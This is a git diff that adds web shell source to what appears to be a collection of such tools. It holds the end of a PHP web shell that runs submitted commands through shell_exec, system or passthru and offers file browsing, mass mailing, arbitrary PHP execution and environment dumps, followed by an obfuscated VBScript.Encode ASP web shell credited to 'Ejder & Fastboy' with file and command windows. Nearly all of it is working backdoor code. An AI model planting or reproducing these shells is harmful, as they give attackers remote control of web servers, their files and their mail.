+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&exec method="post">
+command: <input name="command" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="execute">
+</form>
+<?php
+echo "</td><center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+
+      <th></th><td><a href=".$surl."?&".$word."&special_dir&file=".urlencode($filename).">Special DirOptions</a></td> ";
+echo "</a>";
+exit;
+  }
+?>
+
+
+
+<html>
+  <ul id="Navigation">
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&file_browser&file=<?php echo  "." ?>>File_Browser</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&send_mail>Send Mail(s)</a></li>
+
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&php_code>php_code</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&crypt>crypter</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&php_info>php_info()</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&defined_vars>defined_vars()</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&env>env()</a></li>
+
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&update>update()</a></li>
+  </ul>
+<center><table border="1" rules="groups">
+  <thead>
+    <tr>
+     <th></th>
+       <td>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&exec_st method="post">
+
+<input type="submit" name="sub" value="Execute"><br>
+<br>
+<input type="text" name="command">
+<br>
+<input type="radio" name="method" value="1">shell_exec();
+<input type="radio" name="method" value="2">system();
+<input type="radio" name="method" value="3">passthru();
+<input type="radio" name="method" value="4">automatic();<br>
+<textarea name="exec" rows=15 cols=90>
+<?php
+if (isset($_GET['exec_st'])) {
+    $meth=$_POST['method'];
+      $com=$_POST['command'];
+        if (isset($meth)) {
+          if ($meth=="1") {
+            echo shell_exec($com);
+              }
+               elseif($meth=="2") {
+                 echo system($com); 
+                   }
+                  elseif ($meth=="3") {
+                    passthru($com);
+                     }
+                       elseif ($meth=="4") {
+                         if (function_exists(shell_exec)) {
+                            echo shell_exec($com);
+                              }
+                                 elseif (function_exists(system)) {
+                                   echo system($com);
+                                     }
+                                       elseif (function_exists(passthru)) {
+                                         echo passthru($com);
+                                           }
+                                             else {
+                                              echo "[-]Error";
+                                             }    
+                                          }
+                                       }
+                                    }
+echo "</textarea>";
+exit;
+?> 
\ No newline at end of file
diff --git a/138shell/E/EFSO_2.asp.txt b/138shell/E/EFSO_2.asp.txt
new file mode 100644
index 0000000..8d24d66
--- /dev/null
+++ b/138shell/E/EFSO_2.asp.txt
@@ -0,0 +1,57 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<%#@~^BgAAAA==vL[DMQIAAA==^#~@%>
+<%#@~^4BkAAA==@#@&B3w?}P2NN.PLP~sm/O8KXPDCDm0ıx9CUPHl.ıVhışYı.~6W.PUC.UlF ;WH~ ,KÜ\P_)nS)"q,2L9+M~+,brYDYr.cOO@*@#@&EKÜH,u)|db"q~?)Fdq9q" R,|69dbI9),XCwm^mğıxhı.P(kD,Nğrşk0Vr3,|69!xPÇmsış:m:lkıUCPsl^PGV;.cP$E	[l	P[G^lXı~$bD~/K.!x~çı0lM/l,2x92"P'PUl#jz|R;GH,?WM;UV!P9+ğrV[rMR @#@&vA!PzC.ıVı:[C,onVbşObVhbşPDü:P4+MşnX,~~:mxOıVBPl^LWMkYsCSPHl.ıVıhVC.,?ıWıD9Cx,2%[DPOCMlWıx9C	Pzmyı^:ışYıMR,P2tb~~,Nü"n	P\[+,MöDü	üh~sm/D4GX~C,brYDrDc@#@&v:b|JİPd2İ]1G3gPFzÇqgq1cP(zPA992"@#@&@#@&B2N[+MPhmd~CAIA@#@&@#@&vb0~D5E/Ocrl4^E*PxPrrk3GrPDt+	@#@&vD/2W	/n 1WW0r+k`JHndJ*P{PEFE@#@&B.+k2W	/n 1WWVr/cJHnkJbc+XwkM+k~',xGh3&X+@#@&BUN,k0,@#@&Bb0,xGY~.;;+kOR1WGVb+/cEH+dJ*~{PE8J,Ytx@#@&BM+dwKxdnchDbO+,J@!1nUYD@*@!8D@*@!(D@*@!(.@*I2OVbxPzG0R P@!8M@*@!(D@*4X,İ/0GDakO6@!z^n	Y+M@*J@#@&BMndwKxk+ +U[v#@#@&Enx9PrW@#@&@#@&jD-+M Um.bwDKks+};Y,PxPF TT@#@&s!sValY4x.+aVmmn`]n$En/D ?D-nM.l.rm4s+kcrn):C|KIz1UJb:29J*~E&r~J'E#@#@&sbsnnmY4PxPhr9`oE^swmY4S&x?O."+-`w;^V2mY4~J'J*QF*@#@&sKV[nMnlD4P{PSWO`wE^V2lO4BqU?D.I\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j:j#q(I}!8 2**+G0,|OE@#@&mW	dY,3lMCVYD8'Eb$/G2oM_(9nS\H}np]j:j#oe\J@#@&mKx/DP0CDm3O+M xEm4m9n0TtkNVs:	Wa;./O;7haX.E@#@&NVCHkY~x,J@!tDh^@*@!4+mN@*@!YbOV@*3L9+.~G+x,VWM3~,;"l0P9E.R~Fmşıxhlc R@!zOrDV+@*@!Jtnl9@*@!4G9X@*@!mxDnD@*@!8D@*@!8.@*@!4M@*@!(D@*@!8.@*@!4@*A;Pj^Mk2YbUP:j\~4l3sCMk~2x9AI~PmkYbDc~j.+.k	Nn~}Xxmhl,XlkCVYbDcP@!z8@*@!4.@*@!8D@*@!8.@*@!4.@*@!4.@*@!8@*4z,2xf2"@!J8@*@!z^+	Yn.@*@!z(GNH@*@!J4O:^@*r@#@&NVCHkO ,xPr@!4OsV@*@!4l[@*@!ObYs@*(XPA9G3I@!zOkDVn@*@!ztCN@*@!4K[z@*@!mxO+.@*@!4.@*@!8D@*@!8.@*@!4.@*@!4.@*@!8@*A;,?1DkaY,rPnEsVmxhC,Cl0Vk	PXKV~lMYb3 Pe)klVVmUNbR ~,KÜDV~k+.\.,kU9lBPmK:cODBPLW7RO.,ok(rP0Vlök.~XmNmPdkOn,\CD,r/~~[bD+V~mVLıVmU9ıüıx[mPKYWslDr3,~~3!VsC	ı:ıxı.CPbyk	~-+M::n3On9k.R,i1`K\),3kS~(+UP(;,?^MkaYPbP:ü.3bXn:by~rçbx~B~Xm4l	^ıslMl,3CDşı~V!Vsl	sı:,NrzP5)t9ı: P@!&(@*~@!4M@*@!(D@*@!4M@*@!4M@*@!8M@*@!(@*4HP2x93I@!z(@*@!z^n	YnD@*@!z(W[z@*@!z4OsV@*J@#@&1WUkY,3lMl0O+M&xJZF+fW*vF0,r@#@&1GU/DP0l.lVOD*'rZ@$[^Y?Le`bR|_xU#,Y	N--=i@!@*~c_zr@#@&:mksmmDDmzP{PlM.CXvJHl4WGEBJ4WDhlbVESr:XUnDJSJThmksr~rtl13.J*P~Bö.+s~slk^s+MPXm.CYsl0PrçkUS,?Kbt~Nmx~VmçlDıhC0Prçk	 ,?n1EDkHPb~lşslVPbçkU~(XPABfAI@#@&;"l	Yb{CD.CHPxPm.DmXcE1W:ESrxnYrSr4r.JBJWMorSJTW-JBJ8.r~JbU0KJ#,@#@&Xm/m3ml..mX~',CDMlzcr2993"JSJU)j?)nJBJ5zMtiIr~EAİ"f3\r~J(rD9+:rSEA&IG2\JSEwbjK~65r~Ejz.?)FcZ6HrSrZ6tR:IJBJV6.cK]J*@#@&hkkY~',J?m#jlnR;W\J@#@&GkhPwjr@#@&jnDPsj6,'~ZMnmYn}4N+mD`rjmMk2YbxL wkVjXkY+s68LmDJbP@#@&0WUEs~',K.rs`Dn5!+dYvE0WU!:r##@#@&sGNPxPM+5;/YvE:KN+rb@#@&wW^NnDKCDt+P{~D;;nkY`EoKV[+MKmY4yJ*[J'J@#@&kkVn:,'~.;EdYvJkksn:r#@#@&[+s~{P.+$;+kYcE9+VEb@#@&Wk^n,'~M+$E+kYvE0bVnJ*@#@&WKVN.P{PD5;+kYvJWWs[DE#@#@&Ym4sn,P'~];;+kOvJOm4^+J*@#@&rxN+^Y8P~x,I+$;+kY`rrULmDFE#@#@&bx%+1O ,Px~"+;;nkYcJbUN+^D r#@#@&k	%+1YfP,'~];EdYvJk	%nmD&r#@#@&rUN+^YW~P{P]n$E+dOvJrxNn1Y*r#@#@&k	L^YlP~',In5!+/DcJbxL^O*r#@#@&^:[VKN~P{~I;;nkY`E^sNVW9E*@#@&4l13+9P{~D;;+kYcE4lm0nNr#@#@&KCY4P{P.+5;/O`rKlDtEb@#@&E.s,'~D5!+dD`rED^J*@#@&1W;xDPx~M+;!n/D`J1G;xDJ*@#@&/r"PxPMn;!+dOvJ/r"Jb@#@&[(xCs+,'PM+$;+kYcJ94UCs+J*@#@&943m[rP{PM+5EndD`EN(Vl9kEb@#@&N8db0.+,x,Dn$E/YvJ98/b0.+r#@#@&LN./$VP{~.+$E/O`EnNNnDk5Vr#@#@&k+m~x,Dn;!nkYcr/mJ*@#@&i/DhNlPx~M+;!n/D`J`dnDsNlJb@#@&CMlqP{~D;;nkY`ECMlqJ*@#@&l.m ,'PM+$;+kYcJmDC+r#@#@&VF,'PMn5E/D`E3qE*@#@&3y~',Dn5!+/Ocr3+J*@#@&3f,',D+$EdYvJV&r#@#@&0cP{~D;EdO`r3WJb@#@&AmkOk	LP{P.n$E+dOvJAlbObxLr#@#@&:!D^~',J4YDwl&JhhS J@#@&mK[rxTP{P.+5;/O`r^W9kULr#@#@&[byrP{~M+5!+kY`rNb"kr#@#@&`/n.k:Nl~',D+$;n/D`rjd+.dsNXJ*@#@&klsO,'P.n$En/Dcr/C^Yr#@#@&tmdtyPxPM+5;/YvEtm/tyEb@#@&tm/4&~x,Dn;!n/D`E4m/tfE*@#@&tmd4c~{PM+;!+kO`rtC/4cEb@#@&tmdtlP',.n;!+kYcJ4CktXJ*@#@&4ld4+P'~.;;+kOvJ4m/4vJ*@#@&4lkt{P{P.n$E+kO`rtlk4{J*@#@&tC/40,'~D5E/Ocrtld4RJb@#@&4m/4OP{PD;!n/D`Etm/41r#@#@&4lktFZ~xPM+$En/OcrtC/4q!r#@#@&slN~x,J3sU6r@#@&@#@&b0P0W	;:,'~JrPO4x@#@&VW	E:,x~sKV9+.nCO4@#@&+^d+@#@&oG^N+.KmY4P{~0WU!:@#@&+	N,r0@#@&@#@&b0~hKN+,xPrFJ,O4+	@#@&sGV[nMnCY4~',Dn5!+/O 6W.:vEM+hKYJ#@#@&0Gx!:~',Dn5!+/D 0KD:vE.+sWD+E#@#@&x[PbW@#@&@#@&UKVkdO,'~smsk+@#@&wKwEaP{~smVd+@#@&@#@&b0PsGNP',E+J,WMPhW[n,'~J2EPKD~hKN+~x,J{J,GMPhKNP',JREPKD~:KNn~{PJ8J,WD,hGNP{PEF{E,W.PsGNPx~rF%E~KD~:K[Px,J8,J,WM~:KNnP{PE+ZJPK.PsWN~xPr 8J~W.~sW[+,xPr +E,WD~hKNnP{~r *rP,WD,:K[+,'~Jy*E~KDPsGNP',E+vrPKD~:G[PxPr+GrPG.,:W[n,'~Jy0rPGMPsWNP{~Jy,EPKD~hKN+,xPr&!r~GD,:KNnPx~r&qJ,GD,:G[P'~E2 EPK.,:G9+,'Pr&2EPKD~:KNn~{PJ2J,WD,hGNP{PE&0E,W.PsGNPx~r&,E~KD~:K[Px,JW!J,WM~:KNnP{PE*8JPK.PsWN~xPrcyJ~W.~sW[+,xPrcfE,WD~hKNnP{~rc*rPKDPsW9nP{PEclJ~GMP:K[+,'Pr11J,Y4+U@#@&2Kw;w,xP:D;n@#@&+U[,kW@#@&@#@&kW,:KN+,',EvrPOtx@#@&"+/aGxk+R~;W0D{K.En@#@&?nY,ok^Px~w?r !Yok^nv0r^+*@#@&"+k2W	/nR1WUOxYDzw'Jm22VbmmYrWU&6W.mRNKhUsKlNE@#@&In/aG	/ncb9NCl9nD,J/l1tnR1WxD.W^J~r2.k7lD+E@#@&]/2W	d+cb[[_+l[nMPEZKUD+UDOd+xTY4E~,srVc?r"@#@&"n/aWxkn b9N_+CNn.,J/W	O+	YR9b/wGdbYrW	EBPEmYDlm4:UYpPWk^+UCs+'r~[,sk^ Uls+@#@&]+d2Kxd+c$k	l.zqDkOn,Dnl9$bxCMXwkV`wrVcwCY4#@#@&U+Y,WP{P1KO4k	o=Pj+O~wksP{~1KY4r	o@#@&./2W	dRn	N@#@&+	N,r0@#@&@#@&b0~UKYPsGNP',EG39kMJ~Y4n	@#@&ZmsV,onsTkY@#@&x[PbW@#@&@#@&D/wKxknRSDrYPE@!DkY^n@*As?}~+RZPwW.PjCj?C|c/WtP@!&DkYsn@*J@#@&MnkwG	/RhMkDnPr@!h+Dl~4DYw n;!k\{EEZKxD+UYRPHwnJr~mKxOn	Y'EED+aYJ4D:spP1tlM/O'b/GOR%X1 ,Jr@*J@#@&Dd2W	/RADrOPE@!kOX^+@*E@#@&DndaWU/ SDrD+,J4KNH`:mDLk	)T2Xi0KUY /YHsn)	WM:CVIWKxOOkry)qTa6i^G^W.)[owsowsp0W	Y WlsksX=.n.9lxmSbMkl^I8l13TDGEU[ mGVK.)[&Cfm&lId1DGV^8mDR6l1+O1W^GD=P:&Z&TfZi/1.W^V4m.Rtbo4Vro4O mGVK.),aX[lN*[Ikm.W^s(l. /4lNKh ^W^W.),aq+8 FyI/1DW^s8lMO2NskL4DO^W^GD=P:fm&lfCp/^DKs^4CMOmDDKh ^W^W.),a1[ON,9I/1DW^s8lMODDCmVR1WsWMlP[&Cfm&lId1DGV^8mDR9lM3/4l9Gh mGVKDl~[&l2C&mi8r@#@&D/aWU/n SDrY~Jc3q`6WxOR6lhk^z=r	o9kxT/p~0KxOOkk"n=F*aai)J@#@&.n/aW	/nRA.bYnPr 3y	WG	YOWCsksX=	4[bxT/i,0KUY /ry)qXa6i)E@#@&D+k2Gxk+ch.kOn,JONPWW	YRdDXVnl	W.:msp0G	Y /k.+=q!a6ImKVG.=aswoswsi6GUY 0m:rVzlj+.NmUlBb.rmViNE@#@&.+k2KxdRSDkD+,ElPmGVKDl:A22A32pY+XORNmKDCYrG	)UW	ni)J@#@&M+/2G	/nRS.bYn,Jm)tK\.	1WsWM):*Zl!^i)J@#@&.n/aW	/nRA.bYnPrC)7kdrD+N`^KVGD=:A23A2Ai8r@#@&.+kwGxk+ AMkY~Jm)\bdrYN=tG\n.PmGVK.)[cTCZ+mINr@#@&DdaWUk+chDbY~Jbx2ED~E@#@&D+k2W	/+cA.kD+,J 38.D:SJ@#@&D/2G	/+ AMkO+,Ek+smD	4mm0LDKEUN=afT2!&ZImKVWMl:swswsoiWG	YR0mhk^Xl#DNCUm~)DbC^iWKxDO/bylFZwai7+.Obml^Rl^ko	lhk9N^+IP4nbo4Y=q%pP8GMN+.R^+WY=qa6~kW^kN,al[*9*[i,4G.9+D .kTtY=q26,/KVrN~:8 q 8+i,4G.9+DR8KYOWsl8wa,/KVk9P[q 8 q pP8GMN+MRYKw)82aPkW^k[P:X9*[*9I8r@#@&./wGUk+ hMrD+~rY6YmDC	(l^3TDG;	N)[q 8 FyI^W^WM):soowsoi6GxDOWCskVzlj+.NmUm~)MkmVi6W	OOkk"+=FT2Xi\.Ybml^RCVbo	)hk[[^+IP4nkTtOl8%i~8KD[+MR^+WD)8w6,/Ksk9P:FyF+qyiP(GD9+D .ro4Y=F26~dKVrN,:*9*[X9iP8GMNnD 8KYOK:=FwXPkGVbN~alNX[lNi,8WMN+MROWa)8waPdG^k[P[q 8 q+p8J@#@&M+dwKUk+ SDbY+,J@!&/DXs+@*J@#@&C7gHAA==^#~@%>
+
+<!--EFSO Ejder &  Fastboy tarafından yazılmıştır for SaVSaK.CoM . TÜM HAKLARI Ejder e Aitttir.-->
+<!--TÜM HAKLARI SAKLIDIR.. KODLARDA yapacağınmız bir değişiklik KODun Çalışmamasına mal olur. Bundan dolayı Bir sorun çıkarsa EJDER & SaVSAK.CoM Sorunlu değildir..-->
+<!--Bu yazılımda geliştilmiş tüm herşey , mantık, algoritma, yazılımlar Sıfırdan Ejder tarafından yazılmıştır. TEMA , düzen vede Görünüm Fastboy a Aittir. -->
+<!-- TAKLİTLEİRNDEN KAÇININ. by EJDER-->
+
+<script language=javascript>
+    function NewWindow(mypage, myname, w, h, scroll) {
+        var winl = (screen.width - w) / 2;
+        var wint = (screen.height - h) / 2;
+            winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
+        win = window.open(mypage, myname, winprops)
+        if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
+    }
+    function klasorkopya(yol){
+        NewWindow(yol,"",400,130,"no");
+    }
+    function mass(yol){
+        NewWindow(yol,"",555,600,"yes");
+    }
+    function tester(yol){
+        NewWindow(yol,"",600,600,"yes");
+    }  
+    function klasor(yol){
+        NewWindow(yol,"",420,450,"yes");
+    }    
+    function cmd(yol){
+        NewWindow(yol,"",550,555,"no");
+    }
+    function biz(yol){
+        NewWindow(yol,"",550,700,"no");
+    }  
+    function cmdhelp(yol){
+        NewWindow(yol,"",500,230,"no");
+    }   
+    function somur(yol){
+        NewWindow(yol,"",420,220,"yes");
+    }       
+</script>
+<script language="JavaScript">
+function openInMainWin(winLocation){
+	window.opener.location.href = winLocation
+	window.opener.focus();
+}
+</script>
+<%#@~^ZFwCAA==@#@&/;(PnVlkWM63!@#@&dKx~nMDWM~D/Esn~x6D@#@&P~~,?nY,WP{Poj}RMnOwWsN.vsG^NDnmY4b@#@&P~P,?nO,0m,xP6R?!8oW^NDd@#@&~,P~sK.PAl^4,0F~(	PWm@#@&id7Eq6Pq	/D.`6F 1m:nS,JmKhRDDJ*~@*P8PKD~P(UkY.`6qRglhnBPJLG7RODrb,@*~8PKDP,q	dYM`WFc1Ch~Pr^WsYDrb~@*,F,PGD~~&xdYMc08RHCs+~~ETW-YME*P@*,F,PWMP,(xkY.`6F Hm:+B~JTW\|O.J*P@*PqP~GMP~q	dYM`Wqc1lhnBPEmKh|Y.r#,@*P8P,GD,P(xkY.c6FRgC:~PrdC\kl0mG:Eb,@*~F,~WMP~(	/Y.c6F 1mh~~r/m\/m3|^WsJbP@*Pq~,WD,~q	/YMcWFc1m:n~~Ekl-/mVR1WhE*P@*~q,K4+	@#@&d7idE?+DPDn6D?ODlh6(L+1OP{P0kG ra+	Kn6OobVn`w;V^wCO4~ SOMEn~6C^/n*P@#@&didivY6O?DDnCsr4NnmDRMrO+dk	+cNVCHkO *@#@&id77EY+aOUY.+mh}4%mDRZ^WknxDn@#@&d77iB?OPD+6DjODlsr8Ln^DPxPgGY4kUL,@#@&77idvDdaWUk+c+x9`*@#@&id7Bx[~b0@#@&~P,PdbW~sKV9+.nCO4PxPr^)rPG.,sWs[DKlD4,'~rZ=JPDtU@#@&P~P,P~~,I+k2W	/+c	.kD+,J@!YC8^+~m^C/k'EE04DOhrJ~@*@!OM@*@!DN@*@!0KxD~m^ld/{JEV8JJ@*@!l,YkDsn'rJ,fryrUbPFWazl^l~',Klşı~ErP4DW{BELsbV+hlD4[rghW9+x+L3W	;:{J[wGsNDhlOt'Er[WFcHls+'ELKkhn{J'Ybh[EEPKxm^k1V'rJVVm/G.0WwHC`Dtkk 4D0*i.+O;Mx~0ms/iEE@*c@!&C@*@!&0KUD@*~@!0KxY,m^C/k'EJ0FEE@*@!l,~YbYVxEJ,fbyrxr~UksPrEP4DnW{BJ'obVnnmO4[EQ:KN+{cLVW	Eh'r[oG^N+MKlDt[r'[+^'r[oWs[DKlD4[rJ'W8R1Ch[E[:rs+xr[Dk:[rv@*û@!zC@*,F@!&6WxD@*@!6WxD~dk.+{ @*@!8@*@!l~YbOV'EE,fk"r	kUPbçr	+~VkMPJrP4.+6'vJLsrsnlD4[rg3KU;:{JLsGV[nMnCY4'Jr[Wqc1lhnLJ'Kbh'ELYb:+LJE@*JL0qR	lhnLJ@!JC@*@!z4@*@!&Y9@*@!zOD@*@!JYC4^n@*rP~~,PP~7@#@&~P,~i+sk+@#@&P,P,~P,P]+kwGUk+Rq.kD+Pr@!Ol(VP^VCdk'EJ08DD:EE,@*@!O.@*@!ON@*@!6WUDP1Vlk/{EJ0FEJ@*@!C~DkY^n'rJPGr"k	k,|GwzC^l~[,Plşı,JE~4D+WxEJ'sbsnCDtLJgsW9n'y[VW	Ehxr[sKsNDnmO4[r-r[WF Hm:n[r'Kb:nxr[Yrh[EB,G	msbm0'Jr3^C/KDVWaXCcDtkk tM+0*I.+DEMx~0Csk+IJr@*c@!zC@*@!z0GUD@*~@!6G	Y~1Vm//{JrVFrJ@*@!mP~ObYVxJrPfb"rxbPUksPEE,t.+6xBr[or^+nCO4[EgsG9+xW[0Wx!:{E[wWsNDKCDt[r'NV'r'oW^NDKlO4LJwJLWFc1Ch[J'Pb:n'r'Dkh[rB@*û@!zm@*P8@!&0KxO@*@!0W	OPkkyx+@*@!4@*@!CPOrDVn'rEPGk"r	kx~rçbxnPVrMPErP4D+6'EE[wks+hlO4LJg0Gx!:'r'oW^NDKlO4LJwJLWFc1Ch[J'Pb:n'r'Dkh[rB@*r[6qR	lh+LJ@!&m@*@!J8@*@!zY9@*@!zDD@*@!&YC8^+@*J,~P@#@&~~,PP~~,+UN,r6@#@&,P,PP,P,]+kwGxk+ o^E/4@#@&,PP,Hn6D@#@&P~P~^mVsP4CYm@#@&n	NPd;(@#@&@#@&d!4~GWkXl}3!@#@&iWUPD.GMPDdEs+P	naY@#@&,P~PjnDPWP{~sUr !YsGs9+.`wG^NnMnmYt*@#@&~P,Pj+DPW^,'P6 sbV+k@#@&P,P,sGD~3mm4P6qP&x~W1@#@&~~,P~P,~9WdHlzNk,',WFcxC:@#@&~,PP,~P,xEs~xP&xUY.In-vNG/HCb9kSEcJ#@#@&,P~P,~,P;.l	Yk,',smm/n`"kL4D`NKdXmbNbSs+	`9WdXC)9kbO	;:*#@#@&,PP~~,P~NKA	?OMP{PJ@!l,OkDVn'rJ9GkXlHı~?bVJr~4D0{BE[or^+KlD4[rghG9+'X'0WUEsxr[oKV9+DhlD4[r[[+^'E'wWV9nDhlY4'E-r[6F 1Ch[E[:r:'E'Dk:n'rB@*û@!JC@*@!WKxDP0mmxh4[k	od@*@!lPDrY^+'rE~fKh	VGl[~Y~Jr~tM+WxEJ[or^+KlD4LJ_sW9+'+[6rV'E[6F 2mYtLE[0Wx!hxJLsKV[+.KmY4[r'Kb:nxr[Yrh[EB@*Í@!Jl@*@!z6WxD@*@!WW	Y~0mmnxSkxT[k	o/@*@!CPDkDVn'EE,fG/HCXı,|G2HlVC~LPPlşı,ErP4M+6'Br[wrVnCY4[E_sWNxGL0k^nxJL08R2lO4LJ'Kbh+{J'Ob:+'EEPGx1sbmV{Jr3Vm/K.3KwzlvY4rkRtMn0*iDO;D	P6ls/nIrJ@*c@!&l@*@!C~DkYsn{JEPGGkXC,b9P[,sK.:mY~fğkşOrMPJr~tM+0{vE[wk^+KlO4LJ_:K[+{F'6kVnxr[WFc2mY4LJLk/^+sxJL0qR	lhnLJ[0Gx!:'r'oW^NDKlO4LJ'Kbh+{J'Ob:+'EEPGx1sbmV{Jr3Vm/K.3KwzlvY4rkRtMn0*iDO;D	P6ls/nIrJ@*g@!&l@*@!&WKxY@*E@#@&~P,~,P~,D/wKxknRqDrYPE@!Dl4^nP1VlkdxJr3(DO:EE,@*@!YM@*@!DN@*@!6WxO~kk"+{+@*J@#@&P,PP,P,~/VnmDP^Ck+P!"l	Yk@#@&~P,P,P~P^Ck+~Js[4r@#@&~,PP~~,P~P,~"+daW	/+cMrYPE@!mPOrDV+{EJ,f4,rUPbçk	k~Mö.h3~~,jp^PdGMoE~zmwhl0~bçkU,Kı0Vl,4H~2xf3I,ib~rJP4.+6'Br'ok^+hlOt'EQ:GNxF2[Wr^+'E'wWsN.hlO4[r-JL08 1m:n[r[VG	E:{E[wWV9n.nmY4[E[Prs+xJLOks+'EE@*J'W8RUlsnLJ~]@!6WxDP1GVKDxXVsGS@*JLoWM:lDH;:(+M`WF dbyn~Zb[r@!&WKxY@*Dr[E@!JC@*@!&(@*,@!0KxD~0mmn'SkUL9kxTdPkkyx*@*tP r[[WAUUY.[r@!z6WUO@*@!zO[@*@!&YM@*@!zOm4^+@*r@#@&~P,P~P,P^Ck+PrC/aJ@#@&~~P,P,P~P~~,In/aGxk+ 	MkYn~r@!CPDrDVn{JrPİçk	k,!öDü	Yüs+s+V~bçkx,Pı3^lPrE~tM+6'vJ'obVnnmOtLJ_hKN+x1L0rVxr[oKV9+DhlD4[r-E[6F Hm:+LE[0Wx!hxJLsKV[+.KmY4[r'Kb:nxr[Yrh[EB@*EL0qcxm:+LJ,,@!6WUY,mGsKD'HnV^Wh@*E'sKDslO1;h(+.`6qRkk"nB!#'E@!zWW	O@*TELJ@!zl@*@!J8@*,@!WW	Y~Wmm+{Ak	oNbUL/,/byn'*@*±,@!CPDrY^+xErPfGdHlzıPA[bYs:3Pbçk	~Kı0VCP(X~3xf2"~)*PJr~4D0{BE[or^+KlD4[rghG9+'qTL0rVxr[W8RalY4[r'Kb:n'r[Ors+[r'3KxEsxE[wW^NnDKCDt'JE@*"@!zC@*r[NGA	?ODLE@!zWKxD@*@!JY9@*@!JY.@*@!zOC(V+@*E@#@&PP,~~P,P1ld+~ENwLJBEob0E@#@&PP~~,P~P,~,P]/aWxk+c	DbYnPr@!C~DkY^n'rJP"nd:bPVöDh+V~bçkUP:ıVVmPEE,tDnW{BE[wr^+KmY4[JQ:K[+{F+[6ksn{J[wGV9+DhCOtLJ'J'0q glh+LE[0WU;s'J'oKV[+MKmY4LJLKks+{E[Dkh+LJv@*r[08 xm:+LE~$@!0KxOP^G^W.'HnV^WA@*r[sG.slO1!h(+.v08R/byS!*[E@!J0GUD@*Tr'J@!zl@*@!&4@*P@!0GxO~6l^+{A+(NrUT/Pdr.+xc@*¢@!J0G	Y@*@!0KxD~0mmn'SkUL9kxTdPkkyx*@*, JLNGhUjDD'J@!&0KxO@*@!zY[@*@!zOD@*@!JYC(V@*J@#@&,~P,P~P,mCdP+^d+@#@&P,~~P,P,P~P~]/2W	d+c.rD+PE@!mPOkDs'ErPİçbxk,MöMüUYü^+h+0Prçr	PKı0sl,JJ,4.+6'EJ'srsnCY4'JQ:G[','WbVn'r'wWs9+MnlDtLE-r[WFc1Ch[JLVW	E:{E'sKV9+.nCO4[E[:r:'E'Dk:n'rB@*JLW8RUm:[J,$@!WW	Y~mKVG.{X+^sWS@*JLoGDslD1;:8nM`WFcdk.+ST*[J@!&6WUY@*Dr[E@!zm@*@!J4@*~@!6WUY,0C^'hbUo9kxTd~/by'*@*+~@!l~YbOV'EE,fWdzmXı~29rDVns+0Pkçbx,Pı3^l~4HP3BG2I,l#,JJ,4.+6'EJ'NGdHlKlD4[rghG9+'qTL0rVxr[W8RalY4[r'Kb:n'r[Ors+[r'3KxEsxE[wW^NnDKCDt'JE@*"@!zC@*r[NGA	?ODLE@!zWKxD@*@!JY9@*@!JY.@*@!zOC(V+@*E@#@&PP,~~P,Px[Pdn^+^Y@#@&P,P~H6Y@#@&,P~P1C^V~4lDl@#@&+	[PkE8@#@&@#@&d!4PU;D!mE^n.@#@&d6W.PnC1t~NMr\{~r	Psj6cf.k7nk@#@&id"+/aW	d+c.kD+~E@!YD,8o1WVK.xJra2lflfCrJ@*@!D[P4+rL4Y'EEy!EJ,^^ldk'rJ3(DDhJr@*E@#@&d7]/wKU/RMrO+,J@!l~t.n6'EJ,E[wksnhlY4'rgVW	;s'ELNMk\{c9Db\nSYOnM[J=&PrJ@*r@#@&dik6P[Dr-{ fMr\Yz2'F~O4+UP"nkwG	/RhMkDnPr[U4kwI'	4/aI@!6WxD~^Vm/k'EJVqrJ@*@!@!&0KxO@*Lx4d2pfr/0nDPjüMümü,$J,[,[Db\n{cf.r7+SOYDPL~E)Y[	4dwI'	4dwp'x(/2I@!lPOrDVn'rEUüDü^ü,fYlHıPİçbUP:ı3slrJ~4M+0{EJr[sbsnnmY4[Eg[dal^+{E[9Dr-{R9.b\nSOD+.LJL3W	EsxJL3Gx!:'ErJ@*@!WW	YP1sC/k'rJVFEE@*Ä@!&0KUY@*@!&C@*J@#@&7ikWP9.b\n|RGDk7+Dzw'+PDtnU,I+k2W	/+cA.kD+,J'x8dai'x(dwp@!WG	YP^sm/d'rE0FEr@*p@!z6W	O@*Lx8/aijC(kY,9kk3P]E~[,NMk-+m GDr\J+DYn.,[PElY[U4k2p[U(/ai[	4k2i@!l~YbYsn{JJUü.ümü,f+DCzıPİçbx,KıVVCErP4DW'rJE'wkVnKmY4[r_9/2mm'JLNMr\{ fMk-nd+YDnDLJ[0GUEs'r[VWU;s[EJr@*@!6WUO,mVCdk'EJ0qrJ@*Ä@!z6WxD@*@!&l@*J@#@&idrW,NDb-+|RfMr-+DXa+x&~O4+UP"n/aWUdRh.rD+~JLU(/2p[	4/ai@!WW	Y~m^ldd{JJ0qJr@*i@!&WW	Y@*[U4d2pÇı3CDı^C4bVr.,fkdV,$EPL~9Dr7+|RfMk7nSYO+MP'~r)TLU4kwiLU8/aiLx8/2I@!l~YbOV'EEUüDümü~9YCXı,İçr	PPı0VmJJ,tMn0{JEJLsrsnlD4[rgNk2Cm'r[[Dr-{ fMr\SnOD+D'EL3Gx!h{J'0W	E:LJrE@*@!0GxDP^sm//{EJ0FJr@*Ä@!z6W	Y@*@!&C@*J@#@&i7k6P[.b\+m 